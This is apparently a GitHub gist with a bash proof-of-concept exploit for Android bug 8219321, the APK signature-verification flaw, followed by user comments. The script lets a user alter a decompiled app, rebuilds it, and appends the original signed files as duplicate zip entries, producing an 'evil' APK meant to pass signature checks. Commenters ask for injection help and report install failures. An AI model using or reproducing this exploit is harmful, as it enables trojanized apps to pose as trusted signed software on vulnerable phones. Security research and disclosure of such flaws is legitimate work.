Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Quick & dirty PoC for Android bug 8219321 discovered by BlueboxSec
#!/bin/bash
# PoC for Android bug 8219321 by @pof
# +info: https://jira.cyanogenmod.org/browse/CYAN-1602
if [ -z $1 ]; then echo "Usage: $0 <file.apk>" ; exit 1 ; fi
APK=$1
rm -r out out.apk tmp 2>/dev/null
java -jar apktool.jar d $APK out
#apktool d $APK out
echo "Modify files, when done type 'exit'"
cd out
bash
cd ..
java -jar apktool.jar b out out.apk
#apktool b out out.apk
mkdir tmp
cd tmp/
unzip ../$APK
mv ../out.apk .
cat >poc.py <<-EOF
#!/usr/bin/python
import zipfile
import sys
z = zipfile.ZipFile(sys.argv[1], "a")
z.write(sys.argv[2])
z.close()
EOF
chmod 755 poc.py
for f in `find . -type f |egrep -v "(poc.py|out.apk)"` ; do ./poc.py out.apk "$f" ; done
cp out.apk ../evil-$APK
cd ..
rm -rf tmp out
echo "Modified APK: evil-$APK"
@palani95
Copy link

Found a open source scanner to detect this in Google code,

http://code.google.com/p/bluebox-3xp10it-scanner/

@cvem
Copy link

cvem commented Jul 21, 2013

@poliva Thanks for sharing! :) How can you add duplicate entries inside the apk? Thanks in advance!

@poliva
Copy link
Author

poliva commented Jul 22, 2013

here's an example that can inject contents of an APK into another:
https://github.com/poliva/random-scripts/blob/master/android/masterkey-apk-inject.sh

@cvem
Copy link

cvem commented Jul 27, 2013

@poliva Thanks! :)

@esotericnomen
Copy link

I tried with script. And also, ive tried adding duplicate classes.dex alone in the APK and trying to install on device, but unable to install.

Failure [INSTALL_PARSE_FAILED_CERTIFICATE_ENCODING]
Even with the old android, versions. Any idea on what am i missing?

@huangtaowy
Copy link

@esotericnomen have you solved the problem ?

@xiaoxiong0930
Copy link

I have also met this problem.Is there any solutions?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment